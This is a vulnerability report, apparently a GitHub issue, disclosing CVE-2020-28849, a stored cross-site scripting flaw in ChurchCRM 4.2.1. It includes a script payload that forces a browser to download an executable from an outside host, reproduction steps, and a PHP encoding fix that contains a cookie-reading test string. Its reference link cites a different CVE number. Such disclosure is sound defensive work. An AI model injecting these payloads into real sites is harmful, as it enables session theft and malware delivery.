CVE-2020-28849: Cross Site Scripting Vulnerability leading to Remote File Inclusion · Issue #5477 · ChurchCRM/CRM

Cross Site Scripting (XSS) vulnerability in ChurchCRM version 4.2.1 allows remote attackers to execute arbitrary code and gain sensitive information via a crafted payload in the Add New Deposit field in the View All Deposits module.


Name: Stored Cross Site Scripting leading to Remote File Inclusion vulnerability
Description: ChurchCRM application allows stored XSS, via the ‘Add new Deposit’ module, that is rendered upon ‘View All Deposits’ page visit.
Cross Site Scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to the web application. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
Impact: The vulnerability allows an attacker to send malicious JavaScript code which could result in hijacking of the user’s cookie/session tokens, redirecting the user to a malicious webpage, downloading malicious files hosted on the attacker’s server and performing many other unintended browser actions.
Version Affected: 4.2.1 and below
Payload Used:
<script>var link = document.createElement('a'); link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'; link.download = ''; document.body.appendChild(link); link.click(); </script>
Vulnerable URL: /master/FindDepositSlip.php
Vulnerable Parameters: Deposit Comment
Steps to Reproduce:

  1. Log in to the application and go to the ‘View all Deposits’ module.
  2. Add the payload in the ‘Deposit Comment’ field and click "Add New Deposit".
  3. Payload is executed and a .exe file is downloaded.

Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17205
POC:

Mitigation:
Proper input validation and encoding should be employed to prevent the execution of any hazardous scripts.
Note: There are multiple locations apart from the Deposit module where the input is not sanitized properly.
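The mitigation above is output encoding at render time: the comment is stored as typed, so the fix belongs where ‘View All Deposits’ writes it into the page. The following is an added illustration, not ChurchCRM's code; the function names, the `h()` helper and the `$deposits` array are constructed for this example and do not correspond to anything in the project.

```php
<?php
// Added example (not ChurchCRM code): rendering a stored deposit comment.
// Function names and the $deposits sample are constructed for this illustration.

declare(strict_types=1);

/**
 * Encode an untrusted string for HTML element content or a quoted attribute.
 * ENT_QUOTES encodes both ' and ", so the value is also safe inside
 * single-quoted attributes; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
 * returning an empty string, which would otherwise silently drop the value.
 */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Vulnerable pattern: the stored comment is concatenated into markup as-is. */
function renderDepositRowUnsafe(array $deposit): string
{
    return '<tr><td>' . $deposit['Id'] . '</td><td>' . $deposit['Comment'] . '</td></tr>';
}

/** Hardened pattern: every value that came from a user is encoded at output. */
function renderDepositRowSafe(array $deposit): string
{
    return '<tr><td>' . h((string) $deposit['Id']) . '</td><td>' . h($deposit['Comment']) . '</td></tr>';
}

// Constructed sample rows: one ordinary comment and one containing markup,
// standing in for what the "Deposit Comment" field would hold after the
// stored XSS described in this report.
$deposits = [
    ['Id' => 1, 'Comment' => 'Sunday offering'],
    ['Id' => 2, 'Comment' => '<script>alert(document.cookie)</script>'],
];

foreach ($deposits as $deposit) {
    echo 'UNSAFE: ' . renderDepositRowUnsafe($deposit) . "\n";
    echo 'SAFE:   ' . renderDepositRowSafe($deposit) . "\n";
}
```

Run with `php example.php`: for the second row the unsafe renderer emits the `<script>` element verbatim, while the safe renderer emits `&lt;script&gt;alert(document.cookie)&lt;/script&gt;`, which the browser displays as text. Encoding must match the output context: `htmlspecialchars` covers HTML body and attribute values, but a value placed inside a `<script>` block or a URL needs `json_encode` or `rawurlencode` respectively. Input validation on the deposit form (length limits, rejecting characters the field never needs) is worth adding as defence in depth, and a Content-Security-Policy header without `unsafe-inline` limits what an injected inline script can do if one encoding site is missed, which matters given the report's note that other modules have the same problem.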
